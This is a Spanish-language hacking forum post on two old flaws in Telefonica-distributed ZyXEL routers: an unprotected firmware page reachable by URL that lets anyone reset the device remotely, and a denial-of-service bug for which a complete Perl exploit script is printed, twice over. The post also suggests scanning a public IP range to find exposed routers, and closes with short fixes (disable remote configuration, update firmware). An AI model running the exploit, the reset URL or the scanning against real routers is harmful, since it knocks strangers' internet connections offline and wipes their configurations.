Suscripción al boletín mensual de elhacker.net
Autor
Se trata en conocer las vulnerabilidades de los routers zyxel, modelos 623,652 y 650HW, del fabricante ZyXEL; sabemos que estos routers lo distribuye la Telefonica generalmente. :police:
Aunque estos bugs tienen su tiempo ya : ) la gente todavia no se percata del problema; esto se puede verificar escaneando pcs de por ejemplo entre los rangos de ips 80.24.xxx.xxx. :angel:
Bien presento, los bugs mencionados:
1.- Vulnerabilidad en el control remoto que permite resetear el router:
Como todos sabemos, la mayoria de routers se pueden configurar via telnet (23) o via http (80); bien se ha descubierto este bug en la configuracion via web; si escribimos en la barra de direccion de cualquier explorador:
Código:
http://[ipdelrouter] /rPFWUpload.html
Entraremos a la pantalla de configuracion del router en que permite actualizar el firmware; sección que esta desprotegida de password alguna. Si observamos con mas atencion veremos un boton que permite el reseteo completo del router, osea a su configuracion inicial.
Cabe resaltar que esto es posible en cualquier modelo; y funciona si esta activada la configuracion remota (cosa que viene por defecto)
2.- Vulnerabilidad en ZyXEL Prestige 650HW, 650R-11 es afectado por una ataque DoS
Se trata de un bug que permite un DoS; al introducir una larga longitud de caracteres como password; para este agujero existe un exploit creado por frid4y: ???
Código:
#!/usr/bin/perl
#
# ZyXEL Prestige 650HW-31 and 650R-11 DSL Router
# Running RomPager 4.07 server
# Remote long password DoS exploit
#
# by frid4y ftff[at]c.dk
#
use IO::Socket;
print "\n ZyXEL Prestige 650HW-31/650R-11 DSL Router remote DoS exploit\n";
print " k0ded by frid4y ftff[at]c.dk\n\n";
$target = $ARGV[0];
$port = $ARGV[1];
$foo = "shite"; $bar = "1337";
$packet = $foo x $bar;
$string = "GET / HTTP/1.1\r\nHOST: $target\r\nAuthenticate: $packet\r\n\r\n";
unless (@ARGV == 2) { die " Usage: $0 <target> <port>\n\n" }
@ARGV = ($target, $port);
$conn = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$target",
PeerPort => "$port",
);
unless ($conn) { die " [-] Can't connect to target\n\n" }
else {
print $conn $string;
print " [+] Package delivered to $ARGV[0]\n\n"
}
close($conn);
#
# ZyXEL Prestige 650HW-31 and 650R-11 DSL Router
# Running RomPager 4.07 server
# Remote long password DoS exploit
#
# by frid4y ftff[at]c.dk
#
use IO::Socket;
print "\n ZyXEL Prestige 650HW-31/650R-11 DSL Router remote DoS exploit\n";
print " k0ded by frid4y ftff[at]c.dk\n\n";
$target = $ARGV[0];
$port = $ARGV[1];
$foo = "shite"; $bar = "1337";
$packet = $foo x $bar;
$string = "GET / HTTP/1.1\r\nHOST: $target\r\nAuthenticate: $packet\r\n\r\n";
unless (@ARGV == 2) { die " Usage: $0 <target> <port>\n\n" }
@ARGV = ($target, $port);
$conn = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$target",
PeerPort => "$port",
);
unless ($conn) { die " [-] Can't connect to target\n\n" }
else {
print $conn $string;
print " [+] Package delivered to $ARGV[0]\n\n"
}
close($conn);
La Solucion para los que usan estos router es primero: desabilitar la configuracion remota y segundo: actualizar el firmware. Para mas informacion visiten los siguientes links:
http://www.adslayuda.com
http://www.google.com
Saludos.
En línea
